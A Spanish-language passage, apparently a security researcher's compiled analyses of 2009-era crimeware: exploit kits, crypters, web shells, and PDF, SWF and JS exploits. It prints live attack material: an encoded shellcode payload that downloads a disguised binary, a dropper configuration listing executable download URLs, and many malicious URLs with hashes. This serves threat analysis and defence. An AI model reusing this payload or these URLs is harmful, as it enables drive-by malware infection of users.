Incluso, en la actualidad, ya nadie se sorprende de que las aplicaciones web diseñadas para controlar y administrar botnets a través del protocolo http, se vendan con módulos de exploits pre-configurados, como en el caso de YES Exploit System o Liberty Exploit System, entre tantas otras.

Por otro lado, el negocio del crimeware busca constantemente diseñar "recursos" automatizados que permitan optimizar sus "servicios" y comienzan a aparecer en el mercado clandestino, recursos pensados no solo para automatizar el desarrollo de amenazas sino que también para hacer de esas amenazas lo más complejas posibles.

Cifrado de malware, técnicas anti-debugger, técnicas anti-analisis como la detección de entornos controlados (VirtualBox, VMWare, Virtual PC, SandBox, etc.) y la automatización en la creación de exploits son pruebas fieles que a granel existen en el mercado clandestino de crimeware.

Este último punto en particular, la producción automatizada de exploits, ha generado importantes problemas en los últimos años. 111

Sin irnos demasiado lejos, recordemos el grave problema de seguridad que representó conficker a finales del año pasado al propagarse a través de una vulnerabilidad en la familia de sistemas operativos de Microsoft. Sin embargo, su origen estuvo marcado antes de su aparición.

El proceso de explotación se generó en base a una vulnerabilidad critica sobre el servicio RPC publicada el 23 de octubre de 2008 (MS08-067), que forzó a Microsoft ha lanzar el parche rompiendo su ciclo habitual (el segundo martes de cada mes). Inmediatamente después comenzó a ser explotada por el troyano Gimmiv y la vulnerabilidad aprovechada por un exploit creado por " ph4nt0m ".

Desde allí, la vulnerabilidad fue aprovechada por varios códigos maliciosos. En noviembre, aparece una aplicación que permite automatizar el proceso de creación de exploits para esta debilidad de seguridad, y que además incorpora un escáner de puertos cuyo objetivo es encontrar equipos vulnerables. La aplicación tiene su origen en China.

Un dato curioso es que la versión original de este programa no contiene "sorpresas". Sin embargo, versiones posteriores manipuladas de forma intencionalmente maliciosa ofician a modo de "trampa cazabobo" incorporando un backdoor que se instala de forma silenciosa en el equipo de quien pretende utilizar la aplicación. Es decir, cazador cazado...

También durante noviembre de 2008 aparece la primera versión de conficker , un gusano que de manera efectiva explota esta vulnerabilidad provocando un gran malestar en muchas compañías que sufrieron sus consecuencias en sus redes, y sin lugar a dudas, uno de los códigos maliciosos más mediáticos de la historia.

Durante este año 2009, se conoce otra vulnerabilidad (MS09-002), pero esta vez en Internet 112

Explorer 7, que permite la ejecución de código al momento de acceder a una página web, y comienza a ser incorporada en las aplicaciones web para el control y administración de botnets, explotado los equipos a través de archivos .pdf, archivos .doc, ataques Drive-by-Download y ataques Multi-Stage.

Entre ellas, Phoenix Exploit’s Kit, Fragus, Liberty Exploit System, Eleonore Exploits Pack, Unique Sploits Pack, entre otros.

Pero también aparece una herramienta que permite explotar la vulnerabilidad a través de un proceso de creación de exploits específicos para la misma, que comienza a circular por foros de origen Israelí.

El programa genera un script ofuscado en JS que esconde el exploit.

De esta forma, se propaga el exploit a través de páginas web que explotan en los sistemas Windows por medio del navegador IE7 vulnerable.

Estos exploits son utilizados activamente por los ciber-delincuentes para iniciar los procesos de diseminación e infección, y las aplicaciones que lo generan de forma automática se encuentran In-the-Wild, con el agravante de que su desarrollo no se encuentra limitado a profundos conocimientos de programación.

Como podemos deducir, la gestión e implementación de actualizaciones de seguridad, tanto de los sistemas operativos como de las aplicaciones, no posee una fundamentación trivial, sino que es un aspecto muy importante para mantener la salud de los equipos.

Software as a Service en la industria del malware Hace varios años que tenemos la posibilidad de interactuar con diferentes recursos que se ofrecen vía web sin la necesidad de emplear los recursos, a nivel local, de nuestros equipos; por ejemplo, recuerdo un sistema operativo ( eyeOS) que aplicaba en su momento, y aplica, este concepto, además de otros que habitualmente solemos utilizar como Google Apps .

Sin embargo, en la actualidad este concepto responde a una denominación que esta marcando una tendencia bajo el nombre de Cloud Computing (computación en nube) que ofrece una gama variada de servicios que utilizan como infraestructura central Internet (la nube). 113

Cuando los servicios que se ofrecen son programas, es conocido bajo el acrónimo SaaS (Software as a Services – Software como servicio).

La cuestión es que bajo este nuevo fenómeno, los desarrolladores de malware no se quedaron al margen y dan lugar a una nueva nomenclatura que acompaña el concepto de Cloud Computing, MaaS – Malware as a Service .

Hace unos meses mencionaba un servicio online pago que permite crear códigos maliciosos con capacidades polimórficas basados en el famoso troyano PoisonIvy, denominado PoisonIvy Polymorphic Online Builder .

Sumándose a esta tendencia de ofrecer servicios a través del protocolo HTTP, aparecen varias alternativas como un servicio similar al anteriormente mencionado, pero gratuito, llamado FUDSOnly Online Crypter , que canaliza su actividad en la manipulación en línea de códigos maliciosos con el ánimo de evitar su detección por parte de las compañías antivirus; contribuyendo a la causa que persiguen los desarrolladores de malware de implementar en sus creaciones procesos anti-análisis.

Básicamente se trata de un crypter . Un tipo de programa generalmente utilizado para cifrar los binarios utilizados en la distribución de códigos maliciosos. Este "servicio" posee la "ventaja" de no necesitar descargar ni ejecutar el crypter de forma local en la PC, sino que todo el proceso se lleva a cabo vía web. 114

Al finalizar el proceso, el aplicativo devuelve la siguiente leyenda " Su archivo ha sido encriptado sin errores, Servicio ofrecido por FUDSOnly. Click AQUI para descargar. " que posee el enlace para descargar el archivo manipulado.

Como "extra", el "servicio" ofrece la posibilidad de insertar en el archivo cifrado con el crypter el Eof Data (información del server que se ubica al final del archivo) para aquellos códigos maliciosos que no lo soporten, a través de un pequeño programa llamado ReEoF .

Este servicio ofrecido para manipular malware, ha tenido una versión previa que demuestra que el concepto ya había sido adoptado por los ciber-delincuentes hace bastante tiempo.

De hecho, son muchos los servicios de este estilo que se han subido a la ola.

La industria del malware se suma al concepto que aglomera los servicios en línea propuestos por la Cloud Computing , ampliando la posibilidad y peligrosidad de las amenazas, de continuar con el cotidiano bombardeo que hacen contra los entornos de información, en busca de ampliar la oferta delictiva.

115

Automatización de procesos anti-análisis a través de crimeware La automatización de códigos maliciosos constituye una filosofía de vida y un negocio redondo para sus creadores ya que día a día deben enfocar sus esfuerzos en idear nuevas "herramientas" que permitan "saltar" los métodos de detección propuestos por las firmas antivirus.

Tal es así que constantemente aparecen nuevas "propuestas", cada vez más profesionalizadas, que ayudan a demorar la detección de códigos maliciosos a través de técnicas anti-análisis y, al mismo tiempo, aumentar las ganancias de sus desarrolladores.

CRUM Cryptor Polymorphic es uno de los tantos programas que forman parte de esta categoría. Es un programa utilizado en ambientes maliciosos para cifrar malware; desarrollo en Rusia por personas que se encuentran en el lado malicioso del campo para ampliar el horizonte de ganancias; y el cual he mencionado de manera superficial al referirme al crimeware ruso.

Se trata de una nueva versión de este crypter, exactamente la 1.1, que ofrece capacidades polimórficas para la manipulación de código dañino.

Entre las características polimórficas que propone la aplicación se encuentran, además del mismo polimorfismo:

• Uso de registros aleatorios • Cifrado de importaciones y recursos • Codificación de 128 para cada sección • Sobreescritura de los campos "Rich" y "Time/Date Stamp" de la cabecera de los archivos • Ofrece capacidades anti-debugger • Evita que se lleve a cabo un volcado de memoria • Evitar ejecución en entornos controlados • Cambiar o borra el icono del binario malicioso

Aquí sólo se reúnen sólo algunas de las funcionalidades ofrecidas por el programa, pero suficientes para determinar que el grado de profesionalismo y peligrosidad alcanzado, en este caso por desarrolladores rusos, en la creación de aplicaciones maliciosas es preocupante.

116

Esta aplicación cuesta USD 100 en el mercado negro. Sin embargo, para completar el arsenal de aplicaciones de este estilo, el mismo creador ofrece por "sólo" USD 50 un joiner (utilizado la fusión de archivos) llamado CRUM Joiner Polymorphic y por USD 20 se accede a las actualizaciones del mismo.

La interfaz de este programa, que permite fusionar varios archivos como por ejemplo, a un .jpg fusionarle un binario .exe, se ve de la siguiente manera:

En este caso, algunas de las características que incorpora la aplicación son:

• Capacidades polimórficas • Permite la unión de ilimitados archivos • Soporta varias extensiones de archivos como .doc, .mp3, .avi, .jpg, .bmp y .exe • Cifrado de archivos de 256 bytes • Capacidad de ejecutar no sólo archivos .exe sino que también archivos .dll

En ambos casos, el creador recomienda algunas "medidas de seguridad" para resguardar la "integridad" del desarrollo como no someter la aplicación a servicios como virustotal, ser ordenado al cifrar los archivos y no compartir ninguno de los componentes que constituyen las aplicaciones.

Automatización de procesos anti-análisis II Los mecanismos maliciosos utilizados tanto en el proceso de propagación como en los métodos de infección evolucionan de manera progresiva gracias a los desarrolladores de crimeware que constantemente perfeccionan sus creaciones con el objeto de aumentar su economía.

Esta realidad da cuenta clara que el desarrollo de malware constituye un negocio donde muchos “emprendedores” toman la posta del tema lanzando al mercado viral nuevas alternativas que colaborar activamente en la generación automatizada de códigos maliciosos incorporando procesos auto-defensivos que provocan un efecto negativo para el análisis e investigación de malware.

Hace un tiempo hablábamos de uno de los aplicativos crimeware de origen ruso que se sumaba de manera feroz a la cartera de ofertas que presenta, y representa, el comercio clandestino de malware: la familia de software dañino con características polimórficas de CRUM .

117

A principios de mes, sus creadores lanzaron oficialmente, con fuegos artificiales, nueva versión de sus dos aplicativos crimeware estrellas CRUM Cryptor Polymorphic (v2.6) y C RUM Joiner Polymorphic (v3.1), ambos escritos en Delphi y ASM.

El primero de ellos se trata de un “cripter” polimórfico, un programa cuyo objetivo es cifrar cada archivo procesado. En este caso, el cifrado es a través de una clave aleatoria de 256 bytes. Al mismo tiempo, el archivo dañino también es sometido a polimorfismo con lo cual en cada proceso se obtiene un archivo diferente, lo que es igual a decir… un malware diferente.

Con un valor de USD 200 , este crimeware promete, entre muchas otras, las siguientes funcionalidades:

• Windows 2000, Windows XP SP3, Windows Server 2003 y Windows Vista • Cifrado polimórfico • Cifrado con clave aleatoria de 256 bytes, en versiones anteriores el cifrado es de 128 bytes • Por defecto, el punto de entrada está siempre en la primera sección del binario; sin embargo, puede ser configurado para que sea aleatorio • Anti-VM. Evita la ejecución del binario en máquinas virtuales • Anti-dump. Evita el volcado de memoria • Sustitución de "pixels" del icono al azar • Capacidad para cambiar o borrar el icono • Permite cifrado bajo línea de comandos

Quizás este crimeware parezca un tanto trivial pero su funcionalidad de polimorfismo lo convierte en una amenazas muy peligrosa ya que la mutación que se produce en cada uno de los archivos no es superficial, no cambia algún time stamp sino que realiza importantes cambios en el binario modificando completamente su estructura, formando en cada proceso un nuevo prototipo de malware.

En cuanto al hermano menor de la familia, CRUM Joiner Polymorphic, se encuentra diseñado, como su nombre lo indica, para fusionar (concepto adoptado por el crimeware actual) archivos sin importar su extensión y está escrito en MASM32.

Su precio es de USD 100 y entre sus características se destaca que:

• Al igual que el hermano mayor, posee capacidades polimórficas • Permite fusionar una cantidad ilimitada de archivos con cualquier extensión (mp3, avi, doc, bmp, jpg, exe) • Configurar opciones de funcionalidad en el archivo final (carpeta de alojamiento, atributos, etc.) • Permite seleccionar la iconografía. Por defecto, el software trae 40 imágenes • Cifrado del binario con clave aleatoria de 256 bytes • Soporta Drag & Drop • Capacidad de seleccionar la extensión del archivo final 118

• Extracción de iconos de archivos • Capacidad anti-análisis. No permite la ejecución del binario en máquinas virtuales

Con respecto a las condiciones de venta y uso del crimeware, el autor solicita no compartir el cripter ni sus componentes (esto atenta contra el “negocio”), utilizarlo con fines comerciales (una contradicción evidente) ni someterlo al análisis a través de sitios online como VirusTotal (esto aumenta el índice de detección de su binario). Requerimientos que parecen ser un tanto infantiles.

El objetivo que se encuentra detrás del desarrollo de estos aplicativos es aumentar el ciclo de vida de los códigos maliciosos que son sometidos a los procesos maliciosos propuestos por la aplicación, añadiéndole características anti-análisis que entorpecen su análisis y su posterior detección por parte de las compañías antivirus.

Scripting attack. Explotación múltiple de vulnerabilidades La ejecución de códigos maliciosos a través de ataques scripting forman parte del folklore actual de los códigos maliciosos. Sin embargo, detrás de toda esta batería de métodos de infección, se encuentran involucradas aplicaciones diseñadas íntegramente para cometer este tipo actos dañinos.

Por lo general, se trata de aplicativos crimeware como ZeuS, barracuda, chamaleon, YES, etc., o shells remotas escritas en PHP, como en este caso, la conocida r57shell.

119

Existen muchas aplicaciones de este estilo (c99shell, c100shell, locus, netshell, etc.) que son implantadas, generalmente, en servidores vulnerados a través de RFI (Remote File Inclusion - Inclusión Remota de Archivos) y utilizadas para realizar massive-defacement; es decir, desfiguración masiva de páginas web.

Sin embargo, si bien es habitual que el fin sea este, también son plenamente empleadas para ataques vía web a través de códigos maliciosos como DDoS, SQL Injection y reclutamiento de computadoras zombis, entre otros.

Como podemos apreciar a través de esta segunda captura, las funcionalidades que ofrece r57shell son muchísimas, y no responden a una condición casual ni trivial, ya que la intención es poder controlar completamente el servidor donde se haya implantado. Es decir, se trata de un backdoor a partir del cual un atacante toma control total del servidor, y de cada uno de los nodos alojados en el mismo.

En este caso, la shell en PHP estaba siendo utilizada para propagar malware a través de la explotación de las siguientes vulnerabilidades:

• SuperBuddy LinkSBIcons. (CVE-2006-5820) • Office Snapshot Viewer. (CVE-2008-2463) • WksPictureInterface. (CVE-2008-1898) • OurGame various errors. (SA30469) • GomPlayer OpenURL. (CVE-2007-5779) • QuickTime RTSP. (CVE-2007-0015) • NCTAudioFile2 SetFormatLikeSample. (CVE-2007-0018) • Creative CacheFolder. (CVE-2008-0955) • Windows Media Encoder. (CVE-2008-3008) • Yahoo! Webcam Uploader. (CVE-2007-3147) • Aurigma Photo Uploader. (CVE-2008-0660) • Yahoo! Webcam Viewer. (CVE-2007-3148) • Adobe Collab overflow. (CVE-2007-5659) • Adobe util.printf overflow. (CVE-2008-2992) 120

Todos los exploits para estas vulnerabilidades se encuentran en un solo script cuya apariencia es similar al siguiente, que dicho sea de paso, la captura ha sido cortada.

Al desofuscar el script, se obtienen las siguientes URL's:

• http://vsedlysna.ru/img/site/2/load.php?id=83 --> Descarga el archivo load.exe (MD5: 22027b5c4394c7095c4310e2ec605808) enpaquetado con ASPack v2.12. • http://vsedlysna.ru/img/site/2/pdf.php?id=83 --> Descarga el archivo 9040.pdf (MD5: 3b9e76642e96f3626cf25b7f3f9d6c3a) cuyo nombre de archivo es un valor aleatorio que cambia en cada descarga adopatando nombres como 8795.pdf, 7436.pdf, 6100.pdf, etc. • http://vsedlysna.ru/img/site/2/pdf.php?id=83&vis=1 --> Descarga otro archivo con extensión pdf cuyo nombre varía en cada acceso siguiendo la misma metodología que el caso anterior. En este caso, el archivo se llama 4099.pdf (MD5: 5caf548ff3e6ae0c9101ae647757a099)

Scripting attack II. Conjunción de crimeware para obtener mayor volumen de infección

Otra técnica ampliamente utilizada por los delincuentes informáticos para atacar equipos vía web a través de scripting es la inyección de las instrucciones maliciosas en el código de la página.

121

En este caso, una página web alojada en un servidor vulnerado es utilizada como vector para la propagación de malware por intermedio de la explotación de vulnerabilidades en equipos desprotegidos. Algunas de las páginas empleadas son: http://team-sleep.by .ru/default2 .html http://team-sleep.by .ru/demo .html http://team-sleep.by .ru/disco .html http://team-sleep.by .ru/downloads .html http://team-sleep.by .ru/enter .html http://team-sleep.by .ru/gold .html http://team-sleep.by .ru/googleanalyticsru .html http://team-sleep.by .ru/guest .html http://team-sleep.by .ru/guestbook .html http://team-sleep.by .ru/media .html http://team-sleep.by .ru/menu .html http://team-sleep.by .ru/news .html http://team-sleep.by .ru/photo2 .html http://team-sleep.by .ru/poem .html http://team-sleep.by .ru/press_reviews .html http://team-sleep.by .ru/team-sleep .html http://team-sleep.by .ru/wallpapers .html http://team-sleep.by .ru/gmail .php http://team-sleep.by .ru/haitou .php http://team-sleep.by .ru/in .php http://team-sleep.by .ru/xxx .php http://team-sleep.by .ru/photo/team .html http://team-sleep.by .ru/photo/wallz .html http://team-sleep.by .ru/photo/live/index2 .html http://team-sleep.by .ru/photo/live/imagepages/image1 .html http://team-sleep.by .ru/photo/members/imagepages/image1 .html http://team-sleep.by .ru/photo/team/imagepages/image1 .html

La lista es larga (98 páginas de un mismo sitio). Sin embargo, a través del gráfico quedan todas representadas.

Cada una de estas direcciones web son diseminadas a través de canales como el correo electrónico o clientes de mensajería instantánea empleando alguna estrategia de Ingeniería Social, y alojan varios script ofuscados que contienen diferentes exploits.

122

Al desofuscar los scripts, nos encontramos con el empleo de etiquetas iframe que redireccionan a otras URL's como:

• http://5rublei .com/unique/index .php • http://tochtonenado .com/yes/index .php

Un punto sumamente interesante en relación al crimeware, nos remite directamente al concepto mismo de vulnerabilidad; es decir, el crimeware no queda exento a debilidades por fallos de diseño en su código, lo cual nos permite profundizar un poco más el conocimiento el crimeware violando su integridad.

Tal cual lo ven en la imagen, resulta que se trata del empleo en conjunto de dos conocidos crimeware, Unique Sploits Pack y YES Exploit System .

Esto demuestra que los delincuentes informáticos buscan constantemente encontrar una manera rápida y sencilla, cuanto más automatizada mejor, diferentes formas de ataque que permita aumentar las ganancias.

123

De esta forma, la labor "profesional" que se esconde detrás de estas actividades maliciosas donde el malware es el principal actor buscando continuamente ampliar el abanico de infecciones, los botmaster logran realizar actividades dañinas con un mayor caudal de distribución.

Explotación de vulnerabilidades a través de archivos PDF Explotar debilidades en determinadas aplicaciones de uso masivo, es en la actualidad uno de los vectores de ataque por malware más empleados; y en este sentido ya he posteado la explotación de vulnerabilidades varias a través de SWF y JS.

En este caso, el objetivo del atacante es encontrar equipos con Adobe Acrobat y Adobe Reader vulnerables a un ataque de Desbordamiento de Búfer (Buffer Overflow), descrito en CVE-2008- 2992.

La cuestión es que, un ejemplo concreto lo constituye la dirección http://prororo7.net/sp/index .php . Al acceder a esta URL maliciosa, no se visualiza absolutamente nada pero, en segundo plano, el código exploit explotará el error mencionado en caso de encontrarlo.

En este ejemplo, se descarga y ejecuta de manera remota y arbitraria un malware a través del archivo f.pdf (MD5: 2de9de23f9db1e7b1e39d0481a372399) empleando la función util.printf de Java Script.

El código malicioso se manifiesta bajo el nombre load.exe (MD5: a6e317f29966fa9e2025f29c7d414c0a) y es descargado desde http://prororo7 .net/sp/l.php?b=4&s=P .

Lamentablemente, el archivo PDF es constantemente manipulado por quienes lo propagan para evitar la detección por parte de los programas antivirus, y porqué digo "lamentablemente", por que el índice de detección que este PDF malicioso posee hasta el momento es extremadamente bajo. Tal cual lo podemos observar en el reporte que devuelve VirusTotal, sólo cinco (5) compañías AV de un total de 39 previenen su infección.

Una situación similar se da con el archivo doc.pdf (MD5: 5fa343ebca2dd5a35b38644b81fe0485) que es llamado desde http://toureg-cwo .ch/fta/index.php , y que descarga el archivo 1.exe (MD5: 5c581054fbce67688d2666ac18c7f540) cuya tasa de detección es aún más baja que el anterior (4/39).

Muchas son las direcciones web que se están utilizando de manera activa para propagar malware: tozxiqud .cn/nuc/spl/pdf .pdf teirkmm .net/nuc/spl/pdf .pdf 124 hayboxiw .cn/nuc/spl/pdf .pdf www.ffseik .com/nuc/spl/pdf .pdf www.kuplon .biz/smun/pdf .php?id=2435&vis=1 www.geodll .biz/ar/spl/pdf.pdf setcontrol .biz/ar/spl/pdf .pdf newprogress .tv/fo/spl/pdf .pdf eddii .ru/traffic/sploit1/getfile .php?f=pdf google-analytics.pbtgr .ru/pdf .php?id=48462 hardmoviesporno .com/rf/exp/update1 .pdf

Como verán, las probabilidades de ser víctimas de este tipo de estrategias de infección es alta; en consecuencia, es de suma importancia parchear lo antes posible, quienes utilicen, las aplicaciones de Adobe.

Explotando vulnerabilidades a través de SWF Otro de los formatos masivamente empleados para explotar las debilidades de los equipos, son los Small Web Format, archivos .swf. Por lo general, suelen ser sometidos a la inyección del código exploit para vulnerar un error en particular.

La misma oleada de archivo de ataques a través de JavaScript maliciosos que había mencionado en el post de vulnerabilidades a través de archivos .js, había sido combinada con otras alternativas como la presente.

En este caso se explota una vulnerabilidad en Adobe Flash Player descripta en CVE-2007-0071 mediante la cual a través de un archivo .swf maliciosamente manipulado se provoca un Buffer Overflow permitiendo la ejecución de código por parte de un atacante remoto.

Esto significa que si el usuario que accede, por ejemplo, a la URL http://www.710sese .cn/a1/ (59.34.197.115) se ejecutará el archivo f16.swf (MD5: 95EC9202FBE74D508205442C49825C08) que según el reporte de VirusTotal, es detectado por 18 antivirus de los 39 por los cuales se scanea la muestra. El exploit inserto en el .swf explotará la vulnerabilidad en caso de tener instalada la aplicación y ser vulnerable.

Algunas de las URLs utilizadas para la diseminación del exploit son las siguientes:

http://www.710sese .cn/a1/f16 .swf http://www.710sese .cn/a1/f28 .swf http://www.710sese .cn/a1/f45 .swf http://www.710sese .cn/a1/f47 .swf http://www.710sese .cn/a1/f64 .swf http://www.710sese .cn/a1/f115 .swf http://www.710sese .cn/a1/i28 .swf http://www.710sese .cn/a1/i16 .swf http://www.710sese .cn/a1/i45 .swf http://www.baomaaa .cn/a279/f16 .swf http://www.baomaaa .cn/a279/f28 .swf http://www.baomaaa .cn/a279/f45 .swf http://www.baomaaa .cn/a279/f47 .swf http://www.baomaaa .cn/a279/f64 .swf http://www.baomaaa .cn/a279/f115 .swf http://www.baomaaa .cn/a279/i28 .swf http://www.baomaaa .cn/a279/i16 .swf http://www.baomaaa .cn/a279/i45 .swf http://000.2011wyt .com/versionff .swf http://000.2011wyt .com/versionie .swf http://sss.2010wyt .net/versionie .swf http://sss.2010wyt .net/versionff .swf http://www.misss360 .cn/versionff .swf http://www.misss360 .cn/versionie .swf 125 http://daoye.sh .cn/a08_1272/m16 .swf http://daoye.sh .cn/a08_1272/m28 .swf http://daoye.sh .cn/a08_1272/m45 .swf http://ccsskkk .cn/new7/fl/f16 .swf

http://ccsskkk .cn/new7/fl/f28 .swf http://ccsskkk .cn/new7/fl/f45 .swf http://ccsskkk .cn/new7/fl/f47 .swf http://ccsskkk .cn/new7/fl/f64 .swf http://1.ganbobo .com/template/kankan/js/4.0/curtain .swf http://1.ganbobo .com/template/kankan/js/4.0/playerctrl .swf

Una vez que explota en el equipo, descarga el binario a1.css desde http://d.aidws .com/new, un código malicioso del cual ya hemos hecho mención en otros post.

Explotación de vulnerabilidades a través de JS Explotar vulnerabilidades a través de diferentes tipos de formato de archivo se ha convertido en moneda corriente y en un método altamente empleado por los creadores y diseminadores de malware.

Estos métodos, que además son combinados con diferentes estrategias, se convierten en una bomba de tiempo que se detona con la simple acción de acceder a una página maliciosamente manipulada para albergar estas estrategias de ataque.

Numerosos casos como el aprovechamiento de diferentes debilidades explotadas por intermedio de archivos .js, .swf, .pdf, .mp3, incluso, simulando ser archivos .css, ponen en manifiesto que ningún tipo de archivo se encuentra exento a ser utilizado como canal de propagación y mucho menos como vector de infección.

Durante las últimas semanas, una oleada de archivos .js se vienen utilizando para redireccionar la descarga de códigos maliciosos a través de scripts ofuscados que se esconden en el cuerpo mismo del JavaScript; como el siguiente que se aloja en la URL http://www.710sese .cn/a1/realdadong .js y cuyo hash en md5 es d1094b907dfe99784b206d2ae9b1fe97 : var mybr = unescape(%u6090%u17eb%u645e%u30a1%u0000%u0500%u0800%u0000%uf88b%u00b9%u0004%uf 300%uffa4% ue8e0%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u0870%uec81%u0200%u 0000%uec8b %ue8bb%u020f%u8b00%u8503%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205 d%u6856%ufe 98%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e%uec0e%ua3e8%u0000%u8900%u0445%u 6856%u79c1 %ub8e5%u95e8%u0000%u8900"+"%u1c45%u6856%uc61b%u7946%u87e8%u0000%u8900%u1045% u6856%ufcaa %u7c0d%u79e8%u0000%u8900%u0845%u6856%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0 bb%u020f% u8900%u3303%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00%u285d%uff53%u0455% u6850%u1a3 6%u702f%u3fe8%u0000%u8900%u2445%u7f6a%u5d8d%u5328%u55ff%uc71c%u0544%u5c28%u652 e%uc778%u0 544%u652c%u0000%u5600%u8d56%u287d%uff57%u2075%uff56%u2455%u5756%u55ff%ue80c%u0 062%u0000% uc481%u0200%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b%u560c%u738b %u8b3c%u1 e74%u0378%u56f3%u768b%u0320%u33f3%u49c9%uad41%uc303%u3356%u0ff6%u10be%uf23a%u0 874%ucec1% u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5%ueb8b%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a %udd03%u04 126

8b%u038b%u5ec5%u595b%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100%u 0000%ua4f3% uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07%u6474%uc76c%u0447%u006c%u0000%uff57% u0455%u458 9%uc724%u5207%u6c74%uc741%u0447%u6c6c%u636f%u47c7%u6108%u6574%uc748%u0c47%u61 65%u0070%u 5057%u55ff%u8b08%ub8f0%u0fe4%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074% u5700%u55ff% u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474%uf9e2%u12eb%u348d%u5508%u406a %u046a%uff5 6%u1055%u06c7%u0c80%u0002%uc481%u0100%u0000%ue8c3%uff69%uffff%u048b%u5324%u5251 %u5756%uec b9%u020f%u8b00%u8519%u75db%u3350%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u75 00%u833e% u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f%u8318%u6afb%u2575%uc083% u8b04%ub830 %u0fe0%u0002%u0068%u0000%u6801%u1000%u0000%u006a%u10ff%u0689%u4489%u1824%uecb 9%u020f%uff0 0%u5f01%u5a5e%u5b59%ue4b8%u020f%uff00%ue820%ufdda%uffff%u7468%u7074%u2f3a%u642f %u772e%u6965 %u6b78%u632e%u6d6f%u6e2f%u7765%u612f%u2e31%u7363%u0073);

La cuestión es que, entre las líneas de este script ofuscado, se ejecuta la descarga de un archivo binario, desde una URL diferente, llamado a1.css que aparenta ser un .css (Cascading Style Sheets – Hoja de estilo en cascada). Este binario es un malware.

Además, entre medio de todo el proceso de infección, que dura tan solo unos pocos segundos, establece conexión contra los sitios txt.hsdee .com y www.wdswe .com , donde, desde el primero hace un Drive-by Update en el archivo oo.txt para, cuando este responde con un 200 "OK", descargar los binarios establecidos en dicho archivo. El primero de ellos desde http://www.wdswe .com/new/new1 .exe (md5: 1c0b699171f985b1eab092bf83f2ad37).

La información que se lee en el archivo de texto es la siguiente:

[file] open=y url1=http://www.wdswe .com/new/new1 .exe url2=http://www.wdswe .com/new/new2 .exe url3=http://www.wdswe .com/new/new3 .exe url4=http://www.wdswe .com/new/new4 .exe url5=http://www.wdswe .com/new/new5 .exe url6=http://www.wdswe .com/new/new6 .exe url7=http://www.wdswe .com/new/new7 .exe url8=http://www.wdswe .com/new/new8 .exe url9=http://www.wdswe .com/new/new9 .exe url10=http://www.wdswe .com/new/new10 .exe url11=http://www.wdswe .com/new/new11 .exe url12=http://www.wdswe .com/new/new12 .exe 127 url13=http://www.wdswe .com/new/new13 .exe url14=http://www.wdswe .com/new/new14 .exe url15=http://www.wdswe .com/new/new15 .exe url16=http://www1.wdswe .com/new/new16 .exe url17=http://www1.wdswe .com/new/new17 .exe url18=http://www1.wdswe .com/new/new18 .exe url19=http://www1.wdswe .com/new/new19 .exe url20=http://www1.wdswe .com/new/new20 .exe url21=http://www1.wdswe .com/new/new21 .exe url22=http://www1.wdswe .com/new/new22 .exe url23=http://www1.wdswe .com/new/new23 .exe url24=http://www1.wdswe .com/new/new24 .exe url25=http://www1.wdswe .com/new/new25 .exe url26=http://www1.wdswe .com/new/new26 .exe url27=http://www1.wdswe .com/new/new27 .exe url28=http://www1.wdswe .com/new/new28 .exe count=28

De esta manera se produce la infección con varios códigos maliciosos, la mayoría de ellos diseñados para robar credenciales de autenticación a juegos en línea como WoW.

Algunas otras URL’s utilizadas para propagar malware de la misma manera son: http://97.haowyt .com/js/baidu .js http://97.haowyt .com/js/baidu .js http://www.163wyt .com/js/yahoo .js http://www.710sese .cn/a1/hohogl .js http://www.710sese .cn/a1/wokaono .js http://www.710sese .cn/a1/woriniss .js http://qq.18i16 .net/lzz .js http://qq.18i16 .net/bf .js http://qq.18i16 .net/realplay .js http://qq.18i16 .net/new .js http://qq.18i16 .net/cx .js http://www.baomaaa .cn/a1/realdadong .js http://www.baomaaa .cn/a1/hohogl .js http://www.baomaaa .cn/a1/wokaono .js http://www.baomaaa .cn/a1/woriniss .js http://tj.gan7788 .com/js/js .js http://sss.2010wyt .net/r .js http://sss.2010wyt .net/614 .js

A pesar del empleo, por parte de los creadores de malware, de avanzadas técnicas de infección, existe un elemento fundamental que puede evitar ser víctimas de ataques similares enfocado netamente en mantener las actualizaciones completamente al día, incluidas las aplicaciones.

Phishing Kit. Creador automático de sitios fraudulentos El ciberdelito se encuentra a la orden del día y los criminales informáticos depositan todos sus esfuerzos en sofisticar y automatizar sus estrategias delictivas para seguir alimentando toda la red de delincuentes que se nutren con los beneficios obtenidos a costa de los usuarios.

Una de las estafas más comunes hoy en día son los ataques de phishing donde uno de los métodos habitualmente empleados es la clonación de sitios web de entidades financieras y bancarias que buscan obtener datos sensibles a través del engaño expuesto sobre las debilidades del factor humano.

Sin embargo, la clonación de sitios web no siempre se encuentra limitada a páginas similares a las reales de las entidades bancarias sino que también pueden apuntar su cañón a sitios populares y conocidos como vimos en anteriores post. 128

Ahora, la pregunta es ¿cómo logran automatizar la creación de las páginas falsas?

Evidentemente, la respuesta ronda en programas que permiten crearlas de manera fácil y sencilla como al que pertenece la siguiente interfaz.

Estos programas permiten realizar la clonación de una página con un mínimo esfuerzo que se materializa en el simple hecho de copiar el código fuente de la web real, pasarlo al programa y hacer dos clics para obtener el sitio fraudulento, ofreciendo también la posibilidad de "tocar" el código y adaptarlo al beneficio que busque el atacante.

De esta manera logran obtener la estructura de archivos que comentábamos días atrás con la creación de un archivo de texto plano y un login.php , consiguiendo resultados como el siguiente que luego diseminan a través de Ingeniería Social.

Un sitio muy similar al legítimo donde prácticamente resulta muy difícil detectar el engaño para los usuarios menos experimentados en este tipo de estrategias delictivas.

